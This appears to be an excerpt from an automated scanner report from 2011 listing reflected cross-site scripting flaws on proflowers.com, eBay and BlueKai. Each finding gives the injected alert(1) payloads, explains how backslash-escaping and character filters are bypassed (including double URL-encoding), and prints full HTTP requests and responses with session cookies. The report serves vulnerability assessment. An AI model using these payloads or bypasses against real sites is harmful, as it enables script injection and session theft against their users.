GET /flowers/18-Red-Roses-30050119?viewpos=266204\"%3balert(1)//2ea94e2c6c0&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=xsbbevdz1a3ssdqbzxeccj03; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:32:14 AM; PRVD=SiteSplitID=72; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253APortals%25253AHIC%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/18-Red-Roses-30050119%25253Fviewpos%25253D2%252526trackingpgroup%25253DHIC%252526ref%25253Dfgvprt%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:38:29 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:38:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:38:29 GMT
Content-Length: 166358


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
.cv15 = "";
resx.cv16 ="true";

resx.cv17 ="";
resx.cv18 ="";

resx.cv19 = ""; /* revenue only pass in evar38 */
resx.cv20 = ""; /* event 10 includes c&h */
/* resx.cv21 = "" */
resx.cv22 ="266204\\";alert(1)//2ea94e2c6c0";
resx.cv23 = "";


resx.cv25 = "";
resx.cv26 = "";
resx.cv27= "";
resx.cv28 = "";/* check if it should be discount*/
resx.cv29 = "49.99";
resx.cv30 ="";
resx.cv31="";
resx.cv32="";
resx.c
...[SNIP]...
1.115. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [Ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/20-Sweetheart-Tulips-30007357

Issue detail

The value of the Ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 859ae\"%3balert(1)//49c0c02e430 was submitted in the Ref parameter. This input was echoed as 859ae\\";alert(1)//49c0c02e430 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/20-Sweetheart-Tulips-30007357?viewpos=1&trackingpgroup=HPM&tile=hmpg_podB&Ref=HomeNoRef859ae\"%3balert(1)//49c0c02e430&PageSplit= HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRVD=SiteSplitID=72; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM; mr_referredVisitor=0; RES_TRACKINGID=354557859711349; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=; s_cc=true; RES_SESSIONID=687108066631481; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253AHome%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357%25253Fviewpos%25253D1%252526trackingpgroup%25253DHPM%252526ti%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM?30007357&2/11/2011 10:57:13 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:57:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:57:13 GMT
Content-Length: 161940


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30007357","30007357","30007357","269248","72","HomeNoRef859ae\\";alert(1)//49c0c02e430","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...
1.116. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/20-Sweetheart-Tulips-30007357

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43ef8\"%3balert(1)//47481d06965 was submitted in the trackingpgroup parameter. This input was echoed as 43ef8\\";alert(1)//47481d06965 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/20-Sweetheart-Tulips-30007357?viewpos=1&trackingpgroup=HPM43ef8\"%3balert(1)//47481d06965&tile=hmpg_podB&Ref=HomeNoRef&PageSplit= HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRVD=SiteSplitID=72; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM; mr_referredVisitor=0; RES_TRACKINGID=354557859711349; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=; s_cc=true; RES_SESSIONID=687108066631481; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253AHome%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357%25253Fviewpos%25253D1%252526trackingpgroup%25253DHPM%252526ti%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM?30007357&2/11/2011 10:55:01 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:55:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:55:01 GMT
Content-Length: 155943


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
resx.itemid = "30007357";
resx.qty="1";
resx.price="29.98";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "HPM43ef8\\";alert(1)//47481d06965";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv12 ="";
resx.cv13 ="";
resx.cv14 = "homenoref";
resx.cv15 = "";
...[SNIP]...
1.117. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [viewpos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/20-Sweetheart-Tulips-30007357

Issue detail

The value of the viewpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63910\"%3balert(1)//baa6ca69c91 was submitted in the viewpos parameter. This input was echoed as 63910\\";alert(1)//baa6ca69c91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/20-Sweetheart-Tulips-30007357?viewpos=163910\"%3balert(1)//baa6ca69c91&trackingpgroup=HPM&tile=hmpg_podB&Ref=HomeNoRef&PageSplit= HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRVD=SiteSplitID=72; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM; mr_referredVisitor=0; RES_TRACKINGID=354557859711349; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=; s_cc=true; RES_SESSIONID=687108066631481; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253AHome%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357%25253Fviewpos%25253D1%252526trackingpgroup%25253DHPM%252526ti%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM?30007357&2/11/2011 10:53:57 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:53:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:53:58 GMT
Content-Length: 157371


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
.cv15 = "";
resx.cv16 ="true";

resx.cv17 ="";
resx.cv18 ="";

resx.cv19 = ""; /* revenue only pass in evar38 */
resx.cv20 = ""; /* event 10 includes c&h */
/* resx.cv21 = "" */
resx.cv22 ="163910\\";alert(1)//baa6ca69c91";
resx.cv23 = "";


resx.cv25 = "";
resx.cv26 = "";
resx.cv27= "";
resx.cv28 = "";/* check if it should be discount*/
resx.cv29 = "49.98";
resx.cv30 ="";
resx.cv31="";
resx.cv32="";
resx.c
...[SNIP]...
1.118. http://rover.ebay.com/idmap/0 [footer&cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /idmap/0

Issue detail

The value of the footer&cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d0c65%3balert(1)//3c480ac7649 was submitted in the footer&cb parameter. This input was echoed as d0c65;alert(1)//3c480ac7649 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /idmap/0?footer&cb=vjo.dsf.assembly.VjClientAssembler._callback0d0c65%3balert(1)//3c480ac7649&_vrdm=1297449096889 HTTP/1.1
Host: rover.ebay.com
Proxy-Connection: keep-alive
Referer: http://www.ebay.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cssg=15fccc2d12e0a02652943d14ffeea689; s=CgAD4ACBNVtG0MTVmY2NjMmQxMmUwYTAyNjUyOTQzZDE0ZmZlZWE2ODmOKdKX; nonsession=CgADKACBWu4G0MTVmY2NjMmQxMmUwYTAyNjUyOTQzZDE0ZmZlZWE2OGEAywABTVWHPDEf/9BP; dp1=bu1p/QEBfX0BAX19AQA**4f36b3b4^tzo/1685117e787^; lucky9=5245946; npii=btrm/svid%3D991010211714f36b3c3^tguid/15fccc2d12e0a02652943d14ffeea68a4f36b3c3^cguid/f65c9e8712d0a0aa12e4b294ff6547f14f36b3c3^; ebay=%5Ecv%3D15555%5Esbf%3D%23100000%5Ejs%3D1%5Ecos%3D53%5E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9vt*ts67.1%3F17613-12e15fe4b6c
Cache-Control: private, no-cache
Pragma: no-cache
Content-Type: text/json
Date: Fri, 11 Feb 2011 18:31:50 GMT
Content-Length: 103

try{vjo.dsf.assembly.VjClientAssembler._callback0d0c65;alert(1)//3c480ac7649(["","",86400]);}catch(e){}
1.119. http://tags.bluekai.com/site/50 [phint parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/50

Issue detail

The value of the phint request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 353f6%2527%253balert%25281%2529%252f%252fc16c49bef95 was submitted in the phint parameter. This input was echoed as 353f6';alert(1)//c16c49bef95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /site/50?ret=html&limit=4&btp=1&phint=kw%3D&phint=eid%3D283&phint=a%3D-1&phint=g%3D0&uhint=zip%3D0&phint=tcat%3D152869&phint=kh%3DDBDCB53F2576976D806D6498794024FC353f6%2527%253balert%25281%2529%252f%252fc16c49bef95&phint=bread%3D[Jewelry%20&%20Watches,%20Engagement%20&%20Wedding,%20Engagement%20Rings,%20Diamond,%20Diamond%20Solitaire%20with%20Accents]&phint=bin%3D1499.99&phint=asp%3DMain%20Stone%20Shape,Heart,Main%20Stone%20Treatment,Not%20Enhanced,Carat%20Total%20Weight,0.90%20-%201.39,Exact%20Carat%20Total%20Weight,.90,Main%20Stone%20Certification/Grading,EGL%20USA,Metal,14k%20White%20Gold,Metal%20Purity,14k,Ring%20Size,6,Main%20Stone,Diamond,Style,Engagement,Jewelry%20Type,Ring,Size,6,Gender,Women's HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=200565765597&_trksid=%20p2041474.m622&_trkparms=clkid%3D7016594469467627520
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJpE8VaQtwGt6JKHRxRlMYUehXOxymGwj1kYVzy1cny1eOvulA9hDSeRPV+7/WLPvwqdoutxBRZBQKWJA1UsT16n1RVJxRTw/Lq/z9zrJQADu2UU9GGO9BVGsj1=; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqEpyKodzE/yKnx01sh2sIMfjIUcuf8JY4RytoXJocT5DctrzWZ/C0sbK2ePQXh7RgC+0L9x8KcakQaVeNEm/1Q9142UU5SKALAj2M9Ss/O92Xrq1EOyj+fAFsK1ga8Y6+FlbIlgMzPrn4RysZQTD/VxOxBe+jJgTxoEjwDQdf3okMnBTLit+ffFlpL2gXQIevpK0ovOTKYwx18+oieUQ40fB/AOEO+Px+yP5K10UfNFZltN0eglCNPEGwgLQwoY7sRf7WSh8pdxc7Hd89wP1pBy95DFZKI5GtAOLQzDEGTBes9bojZOTErVXBGaNk53pzYyTrRbnkzn2wC9+yKA7GmCsvCKu0JDqg/kLgrrVMFedxXhFX9Ii9cAAg292ERp5HHUtSvcafg8Y8C9bodR1EeWdmq1+qRc3V4CjVYx71w/D1e3fXr9O3EOTxxYJH4t0pZuGJb8qurnsNQ296i2micNHGa1z5L5xvTeZEdJOsJwbAoYI3uXKM69XKMhg9==; bklc=4d55308f; bk=yQSpJZmZF9ysHNJo; bkc=KJh5NP+/asWD9m9pK2w55z7yxq5kYXJqAZD3VakKDFOuZ67KWSNyaTBWnSiAF/u/kWoCxQd5/R1/BJ9GLGH1GG59Y/EYY//GCRo/0FOOmt5tdoA8dXwmXrtz1dd+pakda/eco6YG+MvQ9/94fjjzqyw59hS9wj69SNVs1Nv8vNlzkYIziJXzpaX0rzgaUuZjXGDc/XnKZZTT+TWfEfvd6lOUJ/92VRaBJd1e5iiL/e23OKRh0EuKXWBUtJ4EyLXMjd5hE6yRc7/9MBECdCDKekQ6clHp3drgKzDJT1n24d0MU167aIwppubx7BfOwU31rbvOm24nfRFkd+qBwHfAoFAv+IeatGmdJKpcIz4T0cH4KOG2FQsQflhry9jFe8ecJamXXWRwxWtY9AIfXlYdqxUAfNQWjkmXXOSLp6rBYkCV0+E8AJ+2lYcJkYXziKF8CwF8L2gyC5wzwj/oU2isXyA2DveBqMQGrDZ02yql0IFzy87zcIv8X0XY1XNcKOFVlpbXcp/8UfJSq8GcLHSU/CuR4HlxdPL0hxLlR8WroQezwZPTxEnaY8dxpFKZ8i5tQvkS4WdmkVO2U/AZ6d+QBLDnlX42ELnlBlbCamFebuO4fK9KkAp8yAKNXPK4oVs2EnSEqy6R7LETsz0wXNv2mGeXuMnkYX2Mw8C+Ol9rkbgg/q2o8SjTTHazZ0BuQzyaybAfQJ7iCSKNXp7pl7YmZp+3tgYEpgKcrbZUKI3STK5GsIqw70lHlqIjZXRUo7pbfGXgDClW0ICbl1mi9+llJamIXOeVjp7Vz0ntp0i/PHNvTvjTTPazbtfzgfUaFVGIKS5A242W16TwV+a4EeTrrPT0Ek5lYm++gCgQlz55rr1XlJxFf1cILH3+yWhlkr8kOp4aYN5QwSu6RJdL1oyLZKva3fE8kZ7rNLjFLhorkw0Fh7Y+BHydSzAvV1sir+4w4uKeIbfArAHa20I+cM8qyLX7clJpVd2yetndWab775KX0SDjladdzL5QFhRsgEbYtNB6DpXpKyffG2AFWgZ2u5pjK5paAFNcewXchwiH2x==; bkst=KJhkAnNv96WDCxzBYYqOyk/DYyLnPIq7p+0jxixZSXyZi6Q6DjrxpHoJk/6sTb3BMSt5gteoWtQkwGYkRsV77VIQLNLJlrg07U18C8LCE8wWpF+ahzIxjfLFWv8NV0+xMQAj5ue9y9kWtcUY+QRCOOgEh4MBLd8Ub8XQGIQGsLHHqHy+IgjGZQ9aTWoEek/pQ6oydEsV0awjBYl5dK04bXzDl4hc5hqBWfX6G1KBJ7MPA323y6S840qweb35653sWAapYpbEwF4Vm6mvOq4rrANdXXugRgZNcD4fkXmTTQpgXwmNRZl8UBGHaxUeMEszYD6jYFa07uEmogJCkWFvrWODisi6W5t2cuFw8x7JAzBN+IB57HqfrN8diu4XNFJaWF4YkLwLApuP/WDnxZe/mE4/QpRLtf2v3RNK4RQndi28rkgN; bkdc=res

Response

HTTP/1.0 200 OK
Date: Fri, 11 Feb 2011 18:33:06 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=4ReD5tQsbDzsHNJo; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5NV+/aaWD9m9prIFbVYUeuA6LYa2Jk3kQj4k/0D5+JFks+W/UODD+3vEDeHWokzvW4Fxsaunxxvn/WMvJ4QHY/OPsDWxoPWHuCMI6ztq7foNp4XpL4MF7lcFZpoZfuxeyBAVepITuoTq4AdY/MKeKGBMSY1yjT5hebfAcN7swOc/lvefQT18HUsUMeQar3XZHmcRxNrI3AcRGoFsWK069K2LOPArkAhmTuyvTvPXTOG26paX6rEu9r6xh8xFlIU3XnDAbG8GfDlaArluccTOw79SqEtR84uY7Zw0QsjCca5BXyFzewnbzbOZw7BqBwETrlVXcsvpW2zL8bgxRwrpQN+4UXn/dx9YrdX14HUGImxdcBp+qzP/q2d9JfrJ3qrocL0BYrq2NzGdPzPm2yANTLggh+IieVc2/OJZrY6IChpRY5JdwzBgQ2uc03svva2TDOa9KgzcMpAhzqNLtIELtQ5ADnfyPIdBuMxSV8Dv2c7J2On5n1KDnIIc241ENdaAZ4KW6+NLh8xFqLOfUwxNS4vEgaBz3egdOd4yb269v2dLGf30nyWpNYsdcd+rwNN6Zj07VIXNycdqiG3Xs10I5UF2VEwcY25iAYdW9+62Jp0rZKmasTd7KBwp/OtY09+IEzd7RcNKY04xIZWlhyimTlgcTdAqBatOdIBFJP2rTOhHEFFOhRdbPJT7Rnhm+8ar26C1RwTl8RKcDglRQFNO1IzJprOd1+9nTnhUG26BINzhBXzveKs2twyNu83DE5Q/phx+wszd7peFo595lTJu6wpN4Bl5+ad4ABKZ7SOFZp8lB2fo7Yp4Bn6p82BAEk3rfeAdeSlWBzfm2ckJ1Izn2tJ2at1XhrcXsx3CrPpxlhxLwTflry4PSU5i788Blv5qdEyhMK5Y1dZJ0QI/3hPirN0fL+2A0Qez457L5aLHBIzJOrcILOsLylj732jv5ZIvaifW4To+y7I0xMkB1XzvkHgtaCMrBIPrL6MVvd8PnPNQ2XHmVPvzPnn3f/g7FJcw4PPyjGl720IicEhqwImxMeZfgcITIleIWNhMwSXfAQZErglI8xlYdaQSMwIothc+BI87jLfQdZF6LCMLXkML+Ap+wzKxhb4XIxnqq; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJpf01F9XvQCNJKHyRWJhonMCfcDGqJ1enGXe9hqlyRYhVjyyNMKDakZCMrXWeWZOCAIOGRYP7IQgY0Dhzp99juPAwxsiGAYhS8SmyBj37YEJfWh1eh8SKFnhiecOhmEOnJu2qV9bQYS/iJw; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
